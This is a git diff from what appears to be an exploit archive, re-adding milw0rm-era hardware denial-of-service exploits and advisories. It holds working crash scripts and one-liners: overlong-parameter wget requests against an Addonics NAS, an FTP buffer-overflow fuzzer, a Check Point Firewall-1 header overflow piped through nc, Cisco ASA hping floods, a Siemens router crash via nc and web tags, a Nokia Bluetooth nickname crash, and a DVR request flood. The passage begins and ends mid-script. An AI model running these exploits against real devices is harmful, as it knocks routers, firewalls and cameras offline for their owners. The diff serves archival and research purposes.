"http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=a&data1=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data2=0;" +;; +'5') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD 
"http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Account_passwd=a&ftp_att=W;" +;; +'6') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=a&Account_passwd=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&ftp_att=W;" +;; +'7') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD 
"http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data1=test&data2=0;" +;; +esac + +echo "Stack Smashed..." + +# milw0rm.com [2009-03-09] diff --git a/platforms/hardware/dos/8260.txt b/platforms/hardware/dos/8260.txt index 58d8fc19a..00c9b1df9 100755 --- a/platforms/hardware/dos/8260.txt +++ b/platforms/hardware/dos/8260.txt 
@@ -1,85 +1,85 @@ - _ _ _____ _ ___ _____ _ _ - / / / / ____/ / / _/_ __/ / / / - / /_/ / __/ / / / / / / / /_/ / - / __ / /___/ /____/ / / / / __ / - /_/ /_/_____/_____/___/ /_/ /_/ /_/ - Helith - 0815 --------------------------------------------------------------------------------- - -Author : Benkei -Date : 2008-02-08 -Vendor : Siemens -Affected product : Gigaset SE461 WiMAX router -Firmware version : 1.5-BL024.9.6401 - Propably other firmware versions are affected as well -Type : Denial of Service - -OSVDB : -Milw0rm : -CVE : -ISS X-Force: : - - -After establishing a tcp connection to the affected device on port 53 from the -LAN interface and after closing the connection the router will restart. - -Sometimes when using the web trigger with Internet explorer the WAN -configuration (ip, gateway ip, dns servers) for the device was lost and a -hardware reset was needed in order to make the device usable again. - -This issue can be triggered from the LAN interface by direct connection or -by using specially crafted web content. For the web content to be able to -trigger the issue a browser withouth security restrictions on connection to -port 53 must be used, the tests done shows Internet Explorer like the only -one cappable of activating the bug. - -Test made worked with Internet explorer version 7.0.6001.18000, it -didnt worked with Opera version 9.63 build 10476, Mozilla Firefox -version 3.0.1. nor Chrome 1.0.154.48. The html tags , an -worked. - - -Steps to reproduce: - -# direct connection -# nc -nvv 192.168.1.1 53 - -Or force someone into the lan segment of the router to open an html file -with one of the following tags and wait for the connection to be established -and closed. After 5 upon 10 seconds the device will reboot. - -<+Tags which can get used+> - - -click me - - -
-
- - - - - - - - - - - -<-End-> - -# example html file -# "p" is a fictional file to ensure that the browser requests something - - - - - - - - - - - -# milw0rm.com [2009-03-23] + _ _ _____ _ ___ _____ _ _ + / / / / ____/ / / _/_ __/ / / / + / /_/ / __/ / / / / / / / /_/ / + / __ / /___/ /____/ / / / / __ / + /_/ /_/_____/_____/___/ /_/ /_/ /_/ + Helith - 0815 +-------------------------------------------------------------------------------- + +Author : Benkei +Date : 2008-02-08 +Vendor : Siemens +Affected product : Gigaset SE461 WiMAX router +Firmware version : 1.5-BL024.9.6401 + Propably other firmware versions are affected as well +Type : Denial of Service + +OSVDB : +Milw0rm : +CVE : +ISS X-Force: : + + +After establishing a tcp connection to the affected device on port 53 from the +LAN interface and after closing the connection the router will restart. + +Sometimes when using the web trigger with Internet explorer the WAN +configuration (ip, gateway ip, dns servers) for the device was lost and a +hardware reset was needed in order to make the device usable again. + +This issue can be triggered from the LAN interface by direct connection or +by using specially crafted web content. For the web content to be able to +trigger the issue a browser withouth security restrictions on connection to +port 53 must be used, the tests done shows Internet Explorer like the only +one cappable of activating the bug. + +Test made worked with Internet explorer version 7.0.6001.18000, it +didnt worked with Opera version 9.63 build 10476, Mozilla Firefox +version 3.0.1. nor Chrome 1.0.154.48. The html tags , an +worked. + + +Steps to reproduce: + +# direct connection +# nc -nvv 192.168.1.1 53 + +Or force someone into the lan segment of the router to open an html file +with one of the following tags and wait for the connection to be established +and closed. After 5 upon 10 seconds the device will reboot. + +<+Tags which can get used+> + + +click me + + +
+
+ + + + + + + + + + + +<-End-> + +# example html file +# "p" is a fictional file to ensure that the browser requests something + + + + + + + + + + + +# milw0rm.com [2009-03-23] diff --git a/platforms/hardware/dos/8313.txt b/platforms/hardware/dos/8313.txt index aed483c25..b40541966 100755 --- a/platforms/hardware/dos/8313.txt +++ b/platforms/hardware/dos/8313.txt 
@@ -1,33 +1,33 @@ -- Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow - -- Description - -The Check Point Firewall-1 PKI Web Service, running by default on TCP -port 18264, is vulnerable to a remote overflow in the handling of very -long HTTP headers. This was discovered during a pen-test where the -client would not allow further analysis and would not provide the full -product/version info. Initial testing indicates the 'Authorization' -and 'Referer' headers were vulnerable. - -- Product - -Check Point, Firewall-1, unknown - -- PoC - -perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 . -"\r\nFrom: bugs@hugs.com\r\nIf-Modified-Since: Fri, 13 Dec 2006 -09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 . -"\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc -suckit.com 18264 - -- Solution - -None - -- Timeline - -2006-11-06: Vulnerability Discovered -2009-03-29: Disclosed to Public - -# milw0rm.com [2009-03-30] +- Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow + +- Description + +The Check Point Firewall-1 PKI Web Service, running by default on TCP +port 18264, is vulnerable to a remote overflow in the handling of very +long HTTP headers. This was discovered during a pen-test where the +client would not allow further analysis and would not provide the full +product/version info. Initial testing indicates the 'Authorization' +and 'Referer' headers were vulnerable. + +- Product + +Check Point, Firewall-1, unknown + +- PoC + +perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 . +"\r\nFrom: bugs@hugs.com\r\nIf-Modified-Since: Fri, 13 Dec 2006 +09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 . +"\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc +suckit.com 18264 + +- Solution + +None + +- Timeline + +2006-11-06: Vulnerability Discovered +2009-03-29: Disclosed to Public + +# milw0rm.com [2009-03-30] 
diff --git a/platforms/hardware/dos/8393.txt b/platforms/hardware/dos/8393.txt
index 4c79776fc..fc3325fa2 100755
--- a/platforms/hardware/dos/8393.txt
+++ b/platforms/hardware/dos/8393.txt
@@ -1,28 +1,28 @@
-The vulnerability affects the following Cisco ASA/PIX versions:
-
-Release Fixed in:
--------- ---------
-6.3 Not affected
-7.0 7.0(8.6)
-7.1 7.1(2.81)
-7.2 7.2(4.30)
-8.0 8.0(4.28)
-8.1 8.1(2.19)
-8.2 8.2(0.230)
-
------------------------------
-Triggering the vuln
-------------------------------
-
-/*Utilize 1550 blocks on an ASA to trigger a crash...*/
-hping --fast -p 22 -w 1518 -S -d 1480 -a 10.22.1.1 10.22.1.2
-
-/* Trigger the vuln a bit faster */
-hping --fast -p 22 -w 1518 -S -d 26201 .a 10.22.1.1 10.22.1.2
-
-Reloading the device is the only way to recover from the denial of service.
-
-| Daniel Uriah Clemens
-"Moments of sorrow are moments of sobriety"
-
-# milw0rm.com [2009-04-10]
+The vulnerability affects the following Cisco ASA/PIX versions:
+
+Release Fixed in:
+-------- ---------
+6.3 Not affected
+7.0 7.0(8.6)
+7.1 7.1(2.81)
+7.2 7.2(4.30)
+8.0 8.0(4.28)
+8.1 8.1(2.19)
+8.2 8.2(0.230)
+
+-----------------------------
+Triggering the vuln
+------------------------------
+
+/*Utilize 1550 blocks on an ASA to trigger a crash...*/
+hping --fast -p 22 -w 1518 -S -d 1480 -a 10.22.1.1 10.22.1.2
+
+/* Trigger the vuln a bit faster */
+hping --fast -p 22 -w 1518 -S -d 26201 .a 10.22.1.1 10.22.1.2
+
+Reloading the device is the only way to recover from the denial of service.
+
+| Daniel Uriah Clemens
+"Moments of sorrow are moments of sobriety"
+
+# milw0rm.com [2009-04-10]
diff --git a/platforms/hardware/dos/8490.sh b/platforms/hardware/dos/8490.sh
index 758274dc6..0308ea9e7 100755
--- a/platforms/hardware/dos/8490.sh
+++ b/platforms/hardware/dos/8490.sh
@@ -1,48 +1,48 @@ -#!/bin/bash -###################################################### -# Addonics NAS Adapter bts.cgi Post-Auth DoS -# Tested against NASU2FW41 Loader 1.17 -# Coded by Mike Cyr, aka h00die -# mcyr2 at csc dot_____________com -# Notes: Any of these BoF crashes the entire stack from the web GUI -# so throw a GET, and bye bye baby! -# Greetz to muts and loganWHD, I tried harder -# http://www.offensive-security.com/offsec101.php turning script kiddies into ninjas daily -# Log: Vendor notification March 25, 2009 -# Vendor response March 26, 2009 -# Milw0rm code release April 19, 2009 -###################################################### - -echo "Addonics NAS Adapter bts.cgi Post-Auth DoS" -echo "Written by H00die" - -echo "------------------------" -echo "Addonics IP:" -read -e IP -echo "Addonics GUI Username:" -read -e USERNAME -echo "Addonics GUI Password:" -read -e PASSWORD - -echo "-----------------------" -echo "Select Buffer:" -echo "1. BT Download Path" -echo "2. BT Torrent Path (only works with a drive attached)" - -read -e BOF - -echo "" -echo "-----------------------" -echo "Sending Malicious GET request" -case "$BOF" in -'1') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=&download_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" -;; -'2') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD 
"http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&download_path=PUBLIC" -;; -esac - -echo "Stack Smashed..." - -# milw0rm.com [2009-04-20] +#!/bin/bash +###################################################### +# Addonics NAS Adapter bts.cgi Post-Auth DoS +# Tested against NASU2FW41 Loader 1.17 +# Coded by Mike Cyr, aka h00die +# mcyr2 at csc dot_____________com +# Notes: Any of these BoF crashes the entire stack from the web GUI +# so throw a GET, and bye bye baby! +# Greetz to muts and loganWHD, I tried harder +# http://www.offensive-security.com/offsec101.php turning script kiddies into ninjas daily +# Log: Vendor notification March 25, 2009 +# Vendor response March 26, 2009 +# Milw0rm code release April 19, 2009 +###################################################### + +echo "Addonics NAS Adapter bts.cgi Post-Auth DoS" +echo "Written by H00die" + +echo "------------------------" +echo "Addonics IP:" +read -e IP +echo "Addonics GUI Username:" +read -e USERNAME +echo "Addonics GUI Password:" +read -e PASSWORD + +echo "-----------------------" +echo "Select Buffer:" +echo "1. BT Download Path" +echo "2. 
BT Torrent Path (only works with a drive attached)" + +read -e BOF + +echo "" +echo "-----------------------" +echo "Sending Malicious GET request" +case "$BOF" in +'1') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=&download_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" +;; +'2') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&download_path=PUBLIC" +;; +esac + +echo "Stack Smashed..." + +# milw0rm.com [2009-04-20] diff --git a/platforms/hardware/dos/856.c b/platforms/hardware/dos/856.c index 38478132d..8b3b48ef4 100755 --- a/platforms/hardware/dos/856.c +++ b/platforms/hardware/dos/856.c 
@@ -1,65 +1,65 @@ -/* - Nokia Bluetab Exploit - Found & coded by Qnix - - - This Exploit will creat file called bluetab.txt with your - bluetooth nickname, send the file to your nokia mobile - open it copy the nickname and paste it to your bluetooth - nickname, if any one search and find your nickname his - mobile will restart . - - this exploit work on many other symbian and java mobiles . - - Qnix - Qnix@bsdmail.org - -*/ - -#include -#define tab1 0x09 -#define tab2 0x2E -#define dot1 0x0A - -int main(int argc,char *argv[]) -{ - - FILE *bluetab; - - if(argc < 2) - { - msgm(); - printf("Useage : ./bluetab \n"); - return 0; - } - else - { - msgm(); - printf("bluetab.txt file created with your nickname . \n"); - } - - bluetab = fopen("bluetab.txt","w"); - if(!bluetab) - { - msgm(); - printf("Some kind of file error!\n"); - return 0; - } - - - fprintf(bluetab,"%s%c%c%c",argv[1],tab1,tab2,dot1); - fclose(bluetab); - return 0; - -} - -msgm() -{ - - printf(" ------------------------------- \n"); - printf(" Nokia Bluetab Exploit \n"); - printf(" found & coded by \n"); - printf(" Qnix@bsdmail.org \n"); - printf(" ------------------------------- \n\n"); -} - -/* v1 2005-03-04 milw0rm.com */ - -// milw0rm.com [2005-09-23] +/* + Nokia Bluetab Exploit + Found & coded by Qnix + + - This Exploit will creat file called bluetab.txt with your + bluetooth nickname, send the file to your nokia mobile + open it copy the nickname and paste it to your bluetooth + nickname, if any one search and find your nickname his + mobile will restart . + - this exploit work on many other symbian and java mobiles . + + Qnix - Qnix@bsdmail.org + +*/ + +#include +#define tab1 0x09 +#define tab2 0x2E +#define dot1 0x0A + +int main(int argc,char *argv[]) +{ + + FILE *bluetab; + + if(argc < 2) + { + msgm(); + printf("Useage : ./bluetab \n"); + return 0; + } + else + { + msgm(); + printf("bluetab.txt file created with your nickname . 
\n"); + } + + bluetab = fopen("bluetab.txt","w"); + if(!bluetab) + { + msgm(); + printf("Some kind of file error!\n"); + return 0; + } + + + fprintf(bluetab,"%s%c%c%c",argv[1],tab1,tab2,dot1); + fclose(bluetab); + return 0; + +} + +msgm() +{ + + printf(" ------------------------------- \n"); + printf(" Nokia Bluetab Exploit \n"); + printf(" found & coded by \n"); + printf(" Qnix@bsdmail.org \n"); + printf(" ------------------------------- \n\n"); +} + +/* v1 2005-03-04 milw0rm.com */ + +// milw0rm.com [2005-09-23] diff --git a/platforms/hardware/dos/8584.py b/platforms/hardware/dos/8584.py index bcee17fdd..36d58aea4 100755 --- a/platforms/hardware/dos/8584.py +++ b/platforms/hardware/dos/8584.py 
@@ -1,74 +1,74 @@ -#!/usr/bin/python -###################################################### -# Addonics NAS Adapter FTP server DoS -# Tested against NASU2FW41 Loader 1.17 -# Coded by Mike Cyr, aka h00die -# mcyr2 at csc dot_____________com -# Notes: Since the HTTP server was so vulnerable, is -# this really a suprise? -# Greetz to muts and loganWHD, I tried harder -# http://www.offensive-security.com/offsec101.php turning script kiddies into ninjas daily -# Log: Vendor notification March 25, 2009 -# Vendor response March 26, 2009 -# Milw0rm release May 1, 2009 -###################################################### - -import socket -import sys - -buffer= 'a' -counter=1 - -ip = raw_input("IP: ") -un = raw_input("Username: ") -password = raw_input("Password: ") - -print "Vulnerable commands" -print "1. rmdir" -print "2. delete" -print "3. rename" -command = raw_input("Command to crash (#): ") - -if command == "1": - print "fuzzing " + ip + " with command rmdir" -elif command == "2": - print "fuzzing " + ip + " with command delete" -elif command == "3": - print "fuzzing " + ip + " with command rename" -else: - print "your an idiot" - sys.exit(1) - -s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) -connect=s.connect(('192.168.2.101',21)) -print s.recv(1024) -s.send('USER ' + un + '\r\n') -print s.recv(1024) -s.send('PASS ' + password + '\r\n') -print s.recv(1024) -if command == "1": - while len(buffer) <=512: - buffer = buffer + 'a' - counter=counter+1 - s.send('XRMD ' + buffer + '\r\n') - print 'rmdir ' + buffer + '\r\n' -elif command == "2": - while len(buffer) <=523: - buffer = buffer + 'a' - counter=counter+1 - s.send('delete ' + buffer + '\r\n') -elif command == "3": - while len(buffer) <=526: - buffer = buffer + 'a' - counter=counter+1 - s.send('RNFR ' + buffer + '\r\n') - answer=s.recv(1024) - s.send('RNTO ' + buffer + '\r\n') - answer=s.recv(1024) -if (answer == "550 Requested action not taken.\r\n"): - print "Stack smashed" -else: - print "fail: " + answer 
-s.close() - -# milw0rm.com [2009-05-01] +#!/usr/bin/python +###################################################### +# Addonics NAS Adapter FTP server DoS +# Tested against NASU2FW41 Loader 1.17 +# Coded by Mike Cyr, aka h00die +# mcyr2 at csc dot_____________com +# Notes: Since the HTTP server was so vulnerable, is +# this really a suprise? +# Greetz to muts and loganWHD, I tried harder +# http://www.offensive-security.com/offsec101.php turning script kiddies into ninjas daily +# Log: Vendor notification March 25, 2009 +# Vendor response March 26, 2009 +# Milw0rm release May 1, 2009 +###################################################### + +import socket +import sys + +buffer= 'a' +counter=1 + +ip = raw_input("IP: ") +un = raw_input("Username: ") +password = raw_input("Password: ") + +print "Vulnerable commands" +print "1. rmdir" +print "2. delete" +print "3. rename" +command = raw_input("Command to crash (#): ") + +if command == "1": + print "fuzzing " + ip + " with command rmdir" +elif command == "2": + print "fuzzing " + ip + " with command delete" +elif command == "3": + print "fuzzing " + ip + " with command rename" +else: + print "your an idiot" + sys.exit(1) + +s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) +connect=s.connect(('192.168.2.101',21)) +print s.recv(1024) +s.send('USER ' + un + '\r\n') +print s.recv(1024) +s.send('PASS ' + password + '\r\n') +print s.recv(1024) +if command == "1": + while len(buffer) <=512: + buffer = buffer + 'a' + counter=counter+1 + s.send('XRMD ' + buffer + '\r\n') + print 'rmdir ' + buffer + '\r\n' +elif command == "2": + while len(buffer) <=523: + buffer = buffer + 'a' + counter=counter+1 + s.send('delete ' + buffer + '\r\n') +elif command == "3": + while len(buffer) <=526: + buffer = buffer + 'a' + counter=counter+1 + s.send('RNFR ' + buffer + '\r\n') + answer=s.recv(1024) + s.send('RNTO ' + buffer + '\r\n') + answer=s.recv(1024) +if (answer == "550 Requested action not taken.\r\n"): + print "Stack smashed" +else: + 
print "fail: " + answer +s.close() + +# milw0rm.com [2009-05-01] diff --git a/platforms/hardware/dos/8964.txt b/platforms/hardware/dos/8964.txt index 1e67cfecf..d9841e93f 100755 --- a/platforms/hardware/dos/8964.txt +++ b/platforms/hardware/dos/8964.txt 
@@ -1,44 +1,44 @@ -Product Name: Netgear DG632 Router -Vendor: http://www.netgear.com -Date: 15 June, 2009 -Author: tom@tomneaves.co.uk < tom@tomneaves.co.uk > -Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt -Discovered: 18 November, 2006 -Disclosed: 15 June, 2009 - -I. DESCRIPTION - -The Netgear DG632 router has a web interface which runs on port 80. This -allows an admin to login and administer the device's settings. However, -a Denial of Service (DoS) vulnerability exists that causes the web interface -to crash and stop responding to further requests. - -II. DETAILS - -Within the "/cgi-bin/" directory of the administrative web interface exists a -file called "firmwarecfg". This file is used for firmware upgrades. A HTTP POST -request for this file causes the web server to hang. The web server will stop -responding to requests and the administrative interface will become inaccessible -until the router is physically restarted. - -While the router will still continue to function at the network level, i.e. it will -still respond to ICMP echo requests and issue leases via DHCP, an administrator will -no longer be able to interact with the administrative web interface. - -This attack can be carried out internally within the network, or over the Internet -if the administrator has enabled the "Remote Management" feature on the router. - -Affected Versions: Firmware V3.4.0_ap (others unknown) - -III. VENDOR RESPONSE - -12 June, 2009 - Contacted vendor. -15 June, 2009 - Vendor responded. Stated the DG632 is an end of life product and is no -longer supported in a production and development sense, as such, there will be no further -firmware releases to resolve this issue. - -IV. 
CREDIT - -Discovered by Tom Neaves - -# milw0rm.com [2009-06-15] +Product Name: Netgear DG632 Router +Vendor: http://www.netgear.com +Date: 15 June, 2009 +Author: tom@tomneaves.co.uk < tom@tomneaves.co.uk > +Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt +Discovered: 18 November, 2006 +Disclosed: 15 June, 2009 + +I. DESCRIPTION + +The Netgear DG632 router has a web interface which runs on port 80. This +allows an admin to login and administer the device's settings. However, +a Denial of Service (DoS) vulnerability exists that causes the web interface +to crash and stop responding to further requests. + +II. DETAILS + +Within the "/cgi-bin/" directory of the administrative web interface exists a +file called "firmwarecfg". This file is used for firmware upgrades. A HTTP POST +request for this file causes the web server to hang. The web server will stop +responding to requests and the administrative interface will become inaccessible +until the router is physically restarted. + +While the router will still continue to function at the network level, i.e. it will +still respond to ICMP echo requests and issue leases via DHCP, an administrator will +no longer be able to interact with the administrative web interface. + +This attack can be carried out internally within the network, or over the Internet +if the administrator has enabled the "Remote Management" feature on the router. + +Affected Versions: Firmware V3.4.0_ap (others unknown) + +III. VENDOR RESPONSE + +12 June, 2009 - Contacted vendor. +15 June, 2009 - Vendor responded. Stated the DG632 is an end of life product and is no +longer supported in a production and development sense, as such, there will be no further +firmware releases to resolve this issue. + +IV. CREDIT + +Discovered by Tom Neaves + +# milw0rm.com [2009-06-15] diff --git a/platforms/hardware/dos/9067.py b/platforms/hardware/dos/9067.py index 566e4a3bf..c660a1def 100755 --- a/platforms/hardware/dos/9067.py 
+++ b/platforms/hardware/dos/9067.py
@@ -1,20 +1,20 @@
-import socket
-import sys
-print "----------------------------------------------------------------"
-print " ARD-9808 DVR Card Security Camera <= Remote Denial Of Service "
-print " author: Stack "
-print "----------------------------------------------------------------"
-host = "127.0.0.1"
-port = 80
-try:
- buff = "//.\\" * 1000
- request = "GET " + buff + " HTTP/1.0"
- connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- connection.connect((host, port))
- connection.send(request)
- raw_input('\n\nExploit completed. Press "Enter" to quit...')
- sys.exit
-except:
- raw_input('\n\nUnable to connect. Press "Enter" to quit...')
-
-# milw0rm.com [2009-07-01]
+import socket
+import sys
+print "----------------------------------------------------------------"
+print " ARD-9808 DVR Card Security Camera <= Remote Denial Of Service "
+print " author: Stack "
+print "----------------------------------------------------------------"
+host = "127.0.0.1"
+port = 80
+try:
+ buff = "//.\\" * 1000
